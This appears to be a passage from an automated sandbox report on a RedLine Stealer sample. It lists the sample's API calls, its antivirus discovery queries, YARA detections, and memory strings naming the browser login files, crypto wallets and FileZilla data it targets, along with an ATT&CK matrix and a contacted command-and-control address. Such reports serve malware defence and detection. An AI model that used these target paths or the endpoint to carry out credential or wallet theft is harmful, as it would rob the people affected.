Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\YPSvIjQCzd.exe

Code function: 1_2_008050D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

1_2_008050D7

Source: C:\Users\user\Desktop\YPSvIjQCzd.exe

Code function: 1_2_00812230 GetUserNameW,

1_2_00812230

Source: C:\Users\user\Desktop\YPSvIjQCzd.exe

Code function: 1_2_0080418A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

1_2_0080418A

Source: C:\Users\user\Desktop\YPSvIjQCzd.exe

Code function: 1_2_007D4AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

1_2_007D4AFE

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: RegSvcs.exe, 00000003.00000002.1480690142.0000000001078000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct

Stealing of Sensitive Information

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.YPSvIjQCzd.exe.1500000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.YPSvIjQCzd.exe.1500000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.1345378402.0000000001500000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1480270706.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: YPSvIjQCzd.exe PID: 7568, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7632, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: YPSvIjQCzd.exe, 00000001.00000002.1345378402.0000000001500000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: [^\u0020-\u007F]ProcessIdname_on_cardencrypted_valuehttps://ipinfo.io/ip%appdata%\logins{0}\FileZilla\recentservers.xml%appdata%\discord\Local Storage\leveldb\tdataAtomicWalletv10/C \EtFile.IOhereuFile.IOm\walFile.IOletsESystem.UItherSystem.UIeumElectrum[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}profiles\Windows\valueexpiras21ation_moas21nth
Source: RegSvcs.exe, 00000003.00000002.1481340987.0000000002E6F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: q5C:\Users\user\AppData\Roaming\Electrum\wallets\*
Source: YPSvIjQCzd.exe, 00000001.00000002.1345378402.0000000001500000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlitessfnExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxeWinhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry.vstring.ReplacedfJaxxpathBSJB
Source: YPSvIjQCzd.exe, 00000001.00000002.1345378402.0000000001500000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlitessfnExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxeWinhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry.vstring.ReplacedfJaxxpathBSJB
Source: RegSvcs.exe, 00000003.00000002.1481340987.0000000002E6F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: \Ethereum\wallets
Source: YPSvIjQCzd.exe, 00000001.00000002.1345378402.0000000001500000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlitessfnExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxeWinhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry.vstring.ReplacedfJaxxpathBSJB
Source: RegSvcs.exe, 00000003.00000002.1481340987.0000000002E6F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Ethereum
Source: RegSvcs.exe, 00000003.00000002.1481340987.0000000002E6F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: q9C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\atomic\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\	Jump to behavior

Source: YPSvIjQCzd.exe	Binary or memory string: WIN_81
Source: YPSvIjQCzd.exe	Binary or memory string: WIN_XP
Source: YPSvIjQCzd.exe	Binary or memory string: WIN_XPe
Source: YPSvIjQCzd.exe	Binary or memory string: WIN_VISTA
Source: YPSvIjQCzd.exe	Binary or memory string: WIN_7
Source: YPSvIjQCzd.exe	Binary or memory string: WIN_8
Source: YPSvIjQCzd.exe, 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Source: Yara match	File source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.YPSvIjQCzd.exe.1500000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.YPSvIjQCzd.exe.1500000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.1345378402.0000000001500000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1480270706.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: YPSvIjQCzd.exe PID: 7568, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7632, type: MEMORYSTR

Remote Access Functionality

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.YPSvIjQCzd.exe.1500000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.YPSvIjQCzd.exe.1500000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.1345378402.0000000001500000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1480270706.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: YPSvIjQCzd.exe PID: 7568, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7632, type: MEMORYSTR

Source: C:\Users\user\Desktop\YPSvIjQCzd.exe	Code function: 1_2_00846596 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,		1_2_00846596
Source: C:\Users\user\Desktop\YPSvIjQCzd.exe	Code function: 1_2_00846A5A socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		1_2_00846A5A

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	221 Windows Management Instrumentation	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	11 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	2 Native API	2 Valid Accounts	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	3 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	2 Valid Accounts	21 Obfuscated Files or Information	Security Account Manager	1 File and Directory Discovery	SMB/Windows Admin Shares	21 Input Capture	11 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	21 Access Token Manipulation	1 Software Packing	NTDS	227 System Information Discovery	Distributed Component Object Model	3 Clipboard Data	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	212 Process Injection	1 DLL Side-Loading	LSA Secrets	361 Security Software Discovery	SSH	Keylogging	12 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	221 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Valid Accounts	DCSync	2 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	221 Virtualization/Sandbox Evasion	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	21 Access Token Manipulation	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	212 Process Injection	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
YPSvIjQCzd.exe	41%	ReversingLabs	Win32.Trojan.Strab
YPSvIjQCzd.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous	0%	URL Reputation	safe
http://schemas.xmlsoap.org/soap/envelope/	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Avira URL Cloud	safe
https://duckduckgo.com/chrome_newtab	0%	Avira URL Cloud	safe
https://duckduckgo.com/ac/?q=	0%	Avira URL Cloud	safe
http://schemas.xmlsoap.org/ws/2004/08/addressing/faultX	0%	Avira URL Cloud	safe
http://tempuri.org/Endpoint/CheckConnectResponse	0%	Avira URL Cloud	safe
http://tempuri.org/Endpoint/EnvironmentSettings	0%	Avira URL Cloud	safe
http://185.38.142.10:7474	0%	Avira URL Cloud	safe
https://ipinfo.io/ip%appdata%	0%	Avira URL Cloud	safe
http://schemas.datacontract.org/2004/07/	0%	Avira URL Cloud	safe
https://api.ip.sb/geoip%USERPEnvironmentROFILE%	0%	Avira URL Cloud	safe
http://tempuri.org/	0%	Avira URL Cloud	safe
http://tempuri.org/Endpoint/SetEnvironment	0%	Avira URL Cloud	safe
http://tempuri.org/Endpoint/VerifyUpdateResponse	0%	Avira URL Cloud	safe
http://tempuri.org/Endpoint/SetEnvironmentResponse	0%	Avira URL Cloud	safe
http://185.38.142.10:7474/	0%	Avira URL Cloud	safe
http://tempuri.org/Endpoint/GetUpdates	0%	Avira URL Cloud	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Avira URL Cloud	safe
http://tempuri.org/Endpoint/CheckConnect	0%	Avira URL Cloud	safe
https://api.ipify.orgcookies//settinString.Removeg	0%	Avira URL Cloud	safe
http://schemas.xmlsoap.org/ws/2004/08/addressing	0%	Avira URL Cloud	safe
http://tempuri.org/Endpoint/GetUpdatesResponse	0%	Avira URL Cloud	safe
185.38.142.10:7474	0%	Avira URL Cloud	safe
http://tempuri.org/Endpoint/VerifyUpdate	0%	Avira URL Cloud	safe
http://185.38.142.10:7474t-	0%	Avira URL Cloud	safe
http://schemas.xmlsoap.org/soap/actor/next	0%	Avira URL Cloud	safe
http://tempuri.org/0	0%	Avira URL Cloud	safe
http://tempuri.org/Endpoint/EnvironmentSettingsResponse	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
api.ip.sb	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://185.38.142.10:7474/	true	Avira URL Cloud: safe	unknown
185.38.142.10:7474	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://ipinfo.io/ip%appdata%	YPSvIjQCzd.exe, 00000001.00000002.1345378402.0000000001500000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1480270706.0000000000402000.00000040.80000000.00040000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://duckduckgo.com/chrome_newtab	tmpE220.tmp.3.dr, tmpE1ED.tmp.3.dr, tmpE1FE.tmp.3.dr, tmpE241.tmp.3.dr, tmpE230.tmp.3.dr, tmpA8A9.tmp.3.dr, tmpE20F.tmp.3.dr, tmp1AF5.tmp.3.dr, tmpE1DC.tmp.3.dr, tmpA8BA.tmp.3.dr, tmpA8A8.tmp.3.dr, tmpE1FD.tmp.3.dr	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	tmpE220.tmp.3.dr, tmpE1ED.tmp.3.dr, tmpE1FE.tmp.3.dr, tmpE241.tmp.3.dr, tmpE230.tmp.3.dr, tmpA8A9.tmp.3.dr, tmpE20F.tmp.3.dr, tmp1AF5.tmp.3.dr, tmpE1DC.tmp.3.dr, tmpA8BA.tmp.3.dr, tmpA8A8.tmp.3.dr, tmpE1FD.tmp.3.dr	false	Avira URL Cloud: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	tmpE220.tmp.3.dr, tmpE1ED.tmp.3.dr, tmpE1FE.tmp.3.dr, tmpE241.tmp.3.dr, tmpE230.tmp.3.dr, tmpA8A9.tmp.3.dr, tmpE20F.tmp.3.dr, tmp1AF5.tmp.3.dr, tmpE1DC.tmp.3.dr, tmpA8BA.tmp.3.dr, tmpA8A8.tmp.3.dr, tmpE1FD.tmp.3.dr	false	Avira URL Cloud: safe	unknown
http://185.38.142.10:7474	RegSvcs.exe, 00000003.00000002.1481340987.0000000002E6F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1481340987.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1481340987.0000000002E63000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous	RegSvcs.exe, 00000003.00000002.1481340987.0000000002D51000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Endpoint/CheckConnectResponse	RegSvcs.exe, 00000003.00000002.1481340987.0000000002D51000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.datacontract.org/2004/07/	RegSvcs.exe, 00000003.00000002.1481340987.0000000002E6F000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/faultX	RegSvcs.exe, 00000003.00000002.1481340987.0000000002D51000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Endpoint/EnvironmentSettings	RegSvcs.exe, 00000003.00000002.1481340987.0000000002D51000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.ip.sb/geoip%USERPEnvironmentROFILE%	YPSvIjQCzd.exe, 00000001.00000002.1345378402.0000000001500000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1480270706.0000000000402000.00000040.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/soap/envelope/	RegSvcs.exe, 00000003.00000002.1481340987.0000000002DA0000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	tmpE220.tmp.3.dr, tmpE1ED.tmp.3.dr, tmpE1FE.tmp.3.dr, tmpE241.tmp.3.dr, tmpE230.tmp.3.dr, tmpA8A9.tmp.3.dr, tmpE20F.tmp.3.dr, tmp1AF5.tmp.3.dr, tmpE1DC.tmp.3.dr, tmpA8BA.tmp.3.dr, tmpA8A8.tmp.3.dr, tmpE1FD.tmp.3.dr	false	Avira URL Cloud: safe	unknown
http://tempuri.org/	RegSvcs.exe, 00000003.00000002.1481340987.0000000002E63000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Endpoint/CheckConnect	RegSvcs.exe, 00000003.00000002.1481340987.0000000002D51000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	tmpE220.tmp.3.dr, tmpE1ED.tmp.3.dr, tmpE1FE.tmp.3.dr, tmpE241.tmp.3.dr, tmpE230.tmp.3.dr, tmpA8A9.tmp.3.dr, tmpE20F.tmp.3.dr, tmp1AF5.tmp.3.dr, tmpE1DC.tmp.3.dr, tmpA8BA.tmp.3.dr, tmpA8A8.tmp.3.dr, tmpE1FD.tmp.3.dr	false	URL Reputation: safe	unknown
https://www.ecosia.org/newtab/	tmpE220.tmp.3.dr, tmpE1ED.tmp.3.dr, tmpE1FE.tmp.3.dr, tmpE241.tmp.3.dr, tmpE230.tmp.3.dr, tmpA8A9.tmp.3.dr, tmpE20F.tmp.3.dr, tmp1AF5.tmp.3.dr, tmpE1DC.tmp.3.dr, tmpA8BA.tmp.3.dr, tmpA8A8.tmp.3.dr, tmpE1FD.tmp.3.dr	false	URL Reputation: safe	unknown
http://tempuri.org/Endpoint/VerifyUpdateResponse	RegSvcs.exe, 00000003.00000002.1481340987.0000000002D51000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Endpoint/SetEnvironment	RegSvcs.exe, 00000003.00000002.1481340987.0000000002E6F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1481340987.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1481340987.0000000002DA0000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Endpoint/SetEnvironmentResponse	RegSvcs.exe, 00000003.00000002.1481340987.0000000002D51000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Endpoint/GetUpdates	RegSvcs.exe, 00000003.00000002.1481340987.0000000002E63000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ac.ecosia.org/autocomplete?q=	tmpE220.tmp.3.dr, tmpE1ED.tmp.3.dr, tmpE1FE.tmp.3.dr, tmpE241.tmp.3.dr, tmpE230.tmp.3.dr, tmpA8A9.tmp.3.dr, tmpE20F.tmp.3.dr, tmp1AF5.tmp.3.dr, tmpE1DC.tmp.3.dr, tmpA8BA.tmp.3.dr, tmpA8A8.tmp.3.dr, tmpE1FD.tmp.3.dr	false	URL Reputation: safe	unknown
https://api.ipify.orgcookies//settinString.Removeg	YPSvIjQCzd.exe, 00000001.00000002.1345378402.0000000001500000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1480270706.0000000000402000.00000040.80000000.00040000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing	RegSvcs.exe, 00000003.00000002.1481340987.0000000002D51000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Endpoint/GetUpdatesResponse	RegSvcs.exe, 00000003.00000002.1481340987.0000000002D51000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	tmpE220.tmp.3.dr, tmpE1ED.tmp.3.dr, tmpE1FE.tmp.3.dr, tmpE241.tmp.3.dr, tmpE230.tmp.3.dr, tmpA8A9.tmp.3.dr, tmpE20F.tmp.3.dr, tmp1AF5.tmp.3.dr, tmpE1DC.tmp.3.dr, tmpA8BA.tmp.3.dr, tmpA8A8.tmp.3.dr, tmpE1FD.tmp.3.dr	false	URL Reputation: safe	unknown
http://tempuri.org/Endpoint/EnvironmentSettingsResponse	RegSvcs.exe, 00000003.00000002.1481340987.0000000002D51000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
